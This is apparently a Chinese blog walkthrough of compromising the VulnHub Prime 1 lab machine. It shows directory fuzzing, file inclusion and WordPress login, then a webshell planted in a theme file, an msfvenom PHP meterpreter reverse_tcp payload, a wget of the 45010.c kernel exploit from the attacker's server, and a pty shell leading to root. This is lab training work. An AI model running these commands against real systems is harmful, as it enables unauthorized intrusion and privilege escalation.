文章目录
概要
靶机地址:
https://www.vulnhub.com/entry/prime-1,358
信息搜集
nmap
扫网段存活ip及端口
找到除了网关外的ip,开放了80端口,登上去看看
是一个网站,直接上科技扫一扫目录
python
python dirsearch.py -u http://192.168.203.152
扫从出来了常见的wordpress,nice。
那么就使用wpscan...
python
wpscan --url http://ip/wordpress/ --e u
扫到一个用户victor,联想到靶机开放了22ssh,那么找到密码就可以尝试进ssh。
没有别的关键信息,换几个扫描工具试试了。。。
python
# dirb http://192.168.203.152 -X .zip,.txt,.rar,.php
找到image.php,index.php,sevret.txt
再看看别的工具
python
# gobuster dir -u http://192.168.203.152 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.tar,.zip
一样的效果,看来就这些了
再换几个工具试试
python
dirsearch -u http://192.168.203.152 -e zip,php,txt,rar,tar -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
这个速度好慢啊,而且结果不是那么明白。
换一个
python
feroxbuster -u http://192.168.203.152 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
速度比dirsearch快一点点,结果还是不理想。只扫出来wp。
接下来把搜集到的东西挨个去访问,前两个都是图片,有个secret.txt打开是提示。。
让我们查看location.txt,试试能看吗。
让我们使用fuzz来测试参数,那么就应该想到文件包含了,先试试fuzz
python
apt-get install wfuzz
wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hw=12 "http://192.168.203.152//index.php?FUZZ=aaaa"
隐藏掉所有响应报文字数为 12 的结果后得到了一个 file 参数:
利用file去包含location.txt
让我们在其他php页面使用那个参数,那么很明显就剩一个了。
更换参数发现没啥显示,尝试文件包含试试
直接包含到大动脉了,
仔细找找看看能有啥发现
这个是显示两个用户,一个victor,一个saket,还显示某个地方存在一个passwd文件,
试试文件包含
那么这个应该是victor的密码了,尝试ssh登录
明显没有那么简单就上去,那么就想想这个密码会是什么地方的?
"wordpress"
前面是扫出来了登录页面的
我们去试试看能登陆上吗
先试试victor
发现直接登录了,
找一下有没有可以写入文件的地方
找到了一处有更新按钮的php文件
里面还有人留下过东西,那么应该就是这了
那就上大动作
蚁剑上
这个是路径
python
http://192.168.203.152/wordpress/wp-content/themes/twentynineteen/secret.php
似乎有点太顺利了,
果然尝试nc,python等反弹shell方法均无效,那么就
只能想其他办法了
msfvenom 嗯
因为电脑已经开了一个win虚拟机,靶机,再开一个kali直接爆炸了,
于是我
直接用我昨天做的隔空kali
有兴趣去上一个作品
服务器开了,kali去连接就行了,接下来的数据都通过服务器处理
现在才觉得
顺序是多么重要。
刚刚在上面使用命令知道了,这个内核是有漏洞的,所以直接使用
看见有个45010.c
把他下载下来,
python
searchsploit -m exploit/linux/local/45010.c
然后上msf
python
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.226.128 lport=4444 -f raw -o shell.php
这个我使用的公网转发,用内网地址代替了,其实是用公网转发到另一套电脑的。
然后就把生成的shell的内容复制到secret.php,并更新他,
接着就是msf组合拳
msfconsole
为啥是127.0.0.1,因为做了转发 ,没明白的看下上一篇。
这样就打进shell了,上面我们还下载了45010.c内核漏洞提权文件
然后我们用python打开一个http服务来让另一台电脑能访问并下载我们的文件。
python
python -m http.server 8888
监听一下 ,在msf里面操作下载文件,
python
wget http://192.168.199.128/45010.c#desktop
#在哪里打开的就是根目录,直接跟上文件就行
因为这个是在蚂蚁中完成的,所以图是这样的
不影响接下来的提权
在msf里面试试也是不行,
但是我发现靶机是有python的
所以想到了pty伪终端
利用python的pty模块创建一个伪终端,
python
python -c:这是Python命令行工具的一个选项,用于执行紧跟在-c后面的Python代码。
import pty;:这行代码导入了Python的pty模块,该模块提供了一些用于创建和管理伪终端的功能。
pty.spawn('/bin/bash');:这行代码使用pty模块的spawn函数来启动一个新的bash shell。/bin/bash是bash shell的默认路径,spawn函数会创建一个新的进程,并在该进程中运行指定的命令(在这个例子中是bash shell)。
python3 -c "import pty;pty.spawn('/bin/bash');"
然后给编译的450加个执行的权限
发现不能执行,找到了tmp文件夹,发现可以执行,所以直接来试试
ok了查看root文件夹
这就是密钥吧
exit退出后使用sudo -l再看看
发现enc可以以root方法执行
找了一下备份密码
python
find / -name '*backup*' 2>dev/nul
然后去执行enc
生成了两个文档
需要解密才行
剩下的交给以后的我,
把基础先学会了。